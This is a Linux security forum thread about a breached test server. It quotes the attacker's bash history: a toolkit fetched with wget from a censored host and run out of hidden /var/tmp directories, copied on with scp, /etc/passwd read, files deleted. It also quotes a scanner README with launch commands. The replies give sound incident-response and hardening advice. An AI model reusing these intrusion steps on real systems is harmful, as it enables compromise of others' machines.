Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I am a newbie Linux sysadmin (but seasoned Windows administrator), and I have five boxes running in a test environment. I thought that until we went live with our production servers, we were safe, and we could let our guard down. But, after I got a Nagios [monitoring service] alert that my SQL server was running a large number of processes, I knew something was wrong.
I logged on and ran a ps -e command. It came back that there were a large numbers of the ssh-scan command running under the pts/2 terminal. But who and users showed that I was the only person on. I did a killall ssh-scan to eliminate the threat, cleaned up the rest of the processes in the pts/2 command ps -e | grep pts/2, changed the root password to a good, strong password, and thought I was done.
Except I wasn't. Two days later, we went through the same routine. Then after that as well. Someone told me that bash logs every command, so I ran locate .bash_history. I came up with our users, one in the root directory, and one in the /var/lib/mysql folder. what? We don't use MySQL, we only use PostgreSQL. I found my clue!
Unfortunetly, that's where I ran out of knowledge. I tried googling a few of the commands, but I wasn't able to figure out the breadth of the attack. I am posting the entire transcript here, maybe someone can tell me where I should be loooking to find more files that he may have dropped on our hard drive, or backdoors that he may have created. At the very least, it can be indexed by Google, and save someone else a bit of trouble.
-Simon
Code:
cd /
ls
cd /
cd home
cd /
cd /tmp
ls
rpm MySQL*
rpm -i MySQL*
su
exit
su
exit
w
uname -a
cat /proc/cpuinfo
/sbin/ifconfig | grep inet
cat /etc/hosts
passwd
w
w
uname -a
cat /proc/cpuinfo
/sbin/ifconfig | grep inet
cd /var/tmp
ls -a
mkdir " "
cd " "
wget {censored}/mech-linux.tgz
cd /var/tmp
mkdir .,
cd .,
ls -a
tar xvf mech-linux.tgz
cd mech-linux
./bash
w
ps -x
cd /var/tmp
cd .,
cd mnech-linux
cd mech-linux
./bash
w
ps -x
cd /var/tmp
cd .,
cd mech-linux
./bash
w
ps -x
cd /var/tmp
cd .,
ls -a
scp mech-linux.tgz guest@{censored}:/var/tmp/.,
w
cd /var/tmp
cd .,
cd dev2
cat vuln.txt
cd mech-linux
export PATH="."
bash
w
cd /var/ymp
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
ps -x
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
ps -x
w
cd /var/tmp
cd .,
cd " "
ls -a
cd /tmp
ls -a
cd " "
cd " "
cd /dev/shm
cd .,
ls -
ls -a
cd /var/tmp
mkdir " "
cd " "
cat /etc/passwd
cd " "
ls -a
cd /var/tmp
cd " "
wget {censored}/mech-linux.tgz
tar xvf mech-linux.tgz
cd mech-linux
export PATH="."
bash
w
ps -x
kill -9 3639
/sbin/ifconfig | grep inet
cat /etc/hosts
cat /etc/passwd
cd /var/tmp
cd .,
cd " "
ls -a
rm -rf *
cd /var/tmp
rm -rf " "
mkdir .,
cd .,
wget {censored}/mech-linux.tgz
tar xvf mech-linux.tgz
cd mech-linux
pico 1.user
nano 1.user
nano 2.user
nano 3.user
touch 4.user
nano 4.user
nano m.set
export PATH="."
bash
w
cd /var/tmp
cd .,
cd dev2
cat vul
cd mech-linux
export PATH="."
bash
w
ps -x
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
ps -x
w
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
After I posted the question, I looked at it again, and saw the logs seemed to gravitate around the /var/tmp folder quite a bit, so I wanted to start poking around there. I ran a ls, but it came up empty, so I tried again, this time with a ls -a. Now I got something, . . ... I knew from a previous poster that when he was hacked, he had found files installed in a directory called ". ", or a dot followed by a space, and I tried that. It worked! I dropped into /var/tmp/. ! Another ls -a, and I saw another hidden folder, .S008. Below this, I found my portscanner! I have posted the README for indexing.
I also see that all the files were owned by the Postgres user. I guess we forgot to change the password when we installed it. Oops.
btw, the I uninstalled mySQL right away. Hopefully, that puts an end to the problems right there.
Quote:
-> pentru scanare in background dai : nohup ./start 211 >> /dev/null &
-> pentru scanare in screen dai : chmod +x * , ./screen , ./start 211 , ctrl a+d (sa iesi din screen , lasand scanul sa mearga);
-> pentru normal dai : ./a 211.211
-> 211 si 211.211 sint exemple ca stiu ca sint unii retardati care nu pricep.
bafta
SpeedNet & RootF*ck
Quote:
Originally Posted by SimonHova
I am a newbie Linux sysadmin (but seasoned Windows administrator), and I have five boxes running in a test environment. I thought that until we went live with our production servers, we were safe, and we could let our guard down. But, after I got a Nagios [monitoring service] alert that my SQL server was running a large number of processes, I knew something was wrong.
(snip!)
btw, the I uninstalled mySQL right away. Hopefully, that puts an end to the problems right there.
You might be being a bit optimistic. Are you familiar with the CERT Checklist? If not, now might be a good time to start working through it. I'm not a security expert, but what I've picked up here tells me that HOPE has no place in this. You have to KNOW how they got in. As in you have evidence. In fact, since they installed MySQL, I can pretty much guarantee that you haven't put an end to anything. The original vulnerability that let them in is still there.
Since you already got one *good* reply I'll try and expand a bit more.
Quote:
Originally Posted by SimonHova
I have five boxes running in a test environment. I thought that until we went live with our production servers, we were safe, and we could let our guard down.
Funny isn't it, how those disasters aren't caused by computers but human decisionmaking...
Quote:
Originally Posted by SimonHova
I logged on and ran a ps -e command. It came back that there were a large numbers of the ssh-scan command running under the pts/2 terminal. But who and users showed that I was the only person on.
'who' and 'users' rely on /var/run/utmp. It may be wiped, it may be altered, it may be subject to other kind of malarky and it will only show those logged in. 'last' (and 'lastb' if you use /var/log/btmp) show current and past login records though can be subject to the same. Then there's the kernel, services and processes that log to logfiles in /var/log. Though subject to the same, if "mined" timely (logwatch, swatch, etc, etc) can serve as "early warning system" for those "ratting the door" so to speak because unless they already know some recon must be done to know where to hit. Recon may come in different forms from a messy nmap scan of about every port they know about to HTTP probes for certain dirs that don't exist to SSH bruteforcing. Even if you run an IDS plus restrictive firewall plus login restrictions plus SELinux, logs are your first warning and often your first clue.
Quote:
Originally Posted by SimonHova
I did a killall ssh-scan to eliminate the threat, cleaned up the rest of the processes
Being on the system is good, because you can *correct* things. Being on the system without plan is bad, because you may disturb things and literally walk over "evidence". Killing is a good reflex. Most things dead don't resurrect easily ;-p Killing is a bad first reflex because you destroy "evidence" that might help you locate where "trouble" resides. Plus it might serve as a warning to perps hiding on the system that someones on to them. Unless there's a rootkit involved, using '/bin/ps axwwwe' should give you all processes plus full width arguments plus process environment nfo to get info from or save for later analysis. A companion command is 'lsof -n' for open files and 'netstat -na' for network connections. Saving all info (preferably remotely) gives you tangible "evidence" (if any).
Quote:
Originally Posted by SimonHova
Except I wasn't. Two days later, we went through the same routine. Then after that as well. Someone told me that bash logs every command, so I ran locate .bash_history. I came up with our users, one in the root directory, and one in the /var/lib/mysql folder. what? We don't use MySQL, we only use PostgreSQL. I found my clue!
'locate' relies on the locate database. That means it's only valid for as long as things don't change. The 'find' command is "realtime" and a more versatile way of looking for things. Shells like Bash allow you to redirect your history to the bitbucket. If not caught redhanded the the shell history contents and the fact somebody didn't delete it may tell you something about the perps MO or skill.
Quote:
Originally Posted by SimonHova
I am posting the entire transcript here, maybe someone can tell me where I should be looking to find more files that he may have dropped on our hard drive, or backdoors that he may have created.
Unfortunately what you have here is the aftermath, the stuff they did after the breach, which isn't that "interesting" because it shows nothing but things related to IRC and such. Look in the system and daemon logs for clues. Verify your filesystem contents. Regardless of the perps MO, if you have any doubts run your investigation from a Live CD like HELIX, KNOPPIX or your distro's installer CD in rescue mode. because from this history, and even though I doubt it, you can't tell for certain they didn't elevate privileges running some exploit on you.
Basic rule for "victims": first read, then make a plan, then execute. Not the other way around ;-p
One thing I learnt along the way was to not type people and not to make assumptions or accusations during the investigative phase for reasons of objectivity. I'm not saying you do or mean to do so here, but I know if I do, I might limit my view of the perp due to my own expectations and perception.
* Forgot to say that if one box in a set gets compromised, check the others as well.
The "atacker" is a newbie script kidie from romania that found some tutorials and programs on DC++ about hacking and stumbled on your server. With absolutely no security it was like a playground for him. He will probably not come back, but just in case monitor after an romanian ip (the censored from "wget {censored}/mech-linux.tgz " might be his own IP adress).
Why I i say he is a newbie from romania: because he didn't erase his tracks and the language from the README you posted is in romanian (i fall off my chair from laughter when i read it because romanian isn't such a popular language )).
I knew a couple of these kind of hackers and after they "hacked" a server, they never returned They just did it for fun, to brag to his friends and to have a IRC bot.
Also, look in the logs from where the ssh connections came from and monitor, in case he cames back for more fun.
To be safe, install a newer version of your distro with all the latest security patches applied.
I'd look at the timestamps for files in the " " directory in /var/tmp and try to correlate it with the system logs that happened around that time. Perhaps you will find a bunch of failed SSH password attempts and then one successful one, or that a service crashed and shortly after a new user created, etc. If the attacker didn't remove his tracks from .bash_history, there is a chance he didn't modify other logs.
After reading this thread I think one important piece of advice has been missed and that is, that a compromised server should never be "cleaned up" and used again with the same operating system image. Even novice Romanian script kiddies have prepackaged backdoors and as such there is always a chance that your system has been rootkit'd. Therefore my recommendation is always to image the system and then completely re-install it. Of course making sure that all of the latest patches have been installed before making it live and adding extra hardening option such as selinux and grsec.
You can then investigate the break in on the imaged drive which is more likely to be accurate since rootkits can manipulate the integrity of the system, such as by hiding files and so forth.
In general I agree with jamesapnic, but there are usually exceptions to the rule. What if the attacker only had user privileges? If management can't tolerate the downtime? If you have complete bash_history list of what the attacker did and the knowledge to fix it? What if there isn't any evidence of a rootkit? What if you're filtering outbound traffic and the attacker wasn't even able to put his tools on your system? Or if the service is chrooted and there isn't any evidence of him escaping it?
I think there are a number of things to consider. Each incident is different so the response should be adjusted accordingly.
I think there are a number of things to consider. Each incident is different so the response should be adjusted accordingly.
I agree. That's why I've always made it a point that incident threads should be handled more carefully than any other threads (I'm not implying that that was the case here. I'd even go that far to say the first reply should be handled by those that handle incidents for a living or at least have a proven reputation at LQ for handling incidents. Mind you, the reason for that is not to drive others away (any solid advice is welcome), but because few people here have the time and knowledge to go in-depth, handle things in a formal and structured way from initial assessment to mop-up.
For instance most of the times the OP will not post all the required nfo. While it's tempting to post advice "nanananah, I wedged in my reply first!!!" the *best* way to start off would be to *ask questions* to clear things up. Once you completed such an assessment you have a picture of things and it would be more effective to base advice on that. If anyone is interested in handling incidents "the right way" (at least in my opinion), please check back this forums previous incident threads (esp. older threads), read the required stuff on the 'net and at LQ (and for instance recaps like http://www.linuxquestions.org/questi...l?#post2291514) and just go for it.
Distribution: OpenBSD 4.6, OS X 10.6.2, CentOS 4 & 5
Posts: 3,660
Rep:
Judging from where you found the initial traces, they probably used a weakness in one of your web applications to gain access, possibly in conjunction with a SQL injection attack or leveraging flaws in the database configuration. I'd say that because the home directory was /var/lib/mysql, even though you use PostgreSQL. They probably just ran a generic PHP/SQL attack and their script assumes that it's MySQL. Of course the other possibility is that you do have MySQL running as part of one of the applications you installed, so even though you're only consciously running PostgreSQL for your web apps, you actually have MySQL running too (and since you didn't realize it was running, you didn't take precautions to lock it down).
In any case, the vast majority of external break-ins these days come from poor web application security, so go over any web/db services running on that machine with a fine-toothed comb.
I agree. That's why I've always made it a point that incident threads should be handled more carefully than any other threads (I'm not implying that that was the case here. I'd even go that far to say the first reply should be handled by those that handle incidents for a living or at least have a proven reputation at LQ for handling incidents. Mind you, the reason for that is not to drive others away (any solid advice is welcome), but because few people here have the time and knowledge to go in-depth, handle things in a formal and structured way from initial assessment to mop-up.
Yeah, I know of another security forum where only approved members can assist other members in recovering from incidents (mostly spyware). It makes sense, and helps prevent a bad situation from becoming worse.
Quote:
Originally Posted by unSpawn
For instance most of the times the OP will not post all the required nfo. While it's tempting to post advice "nanananah, I wedged in my reply first!!!" the *best* way to start off would be to *ask questions* to clear things up. Once you completed such an assessment you have a picture of things and it would be more effective to base advice on that. If anyone is interested in handling incidents "the right way" (at least in my opinion), please check back this forums previous incident threads (esp. older threads), read the required stuff on the 'net and at LQ (and for instance recaps like http://www.linuxquestions.org/questi...l?#post2291514) and just go for it.
If you guys get enough of these incident threads, perhaps LQ needs an official Incident Report Form.
UnSpawn to the rescue again.... I totally agree with him. There is alot of time spent into incident response and handling. It is not something that can be learned overnight. It takes years and years of knowledge. Understanding how the system operates at the system level and/or kernel level. While there are always hackers out there i would recommend that the OP looks into extra security for the servers. There are hunderds of options that he can do to increase the security of the system.
kernel level:
Grsecurity
SELinux
RBAC
LIDS
application level:
apache mod security
hardened PHP
chroot processes
General security:
disable root ssh in /etc/ssh/sshd_config
remote syslog server that the systems log to.
Daily emails from the servers
Enforce strong passwords
Most of the stuff above will keep out the vast majority of script kiddies. If there is someone out there that wants in your system and he is good enough then he will get in. BUT most of the people that have the knowledge to get into a hardened server are not going to bother with it. They have more important things to do then hack _your_ system.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.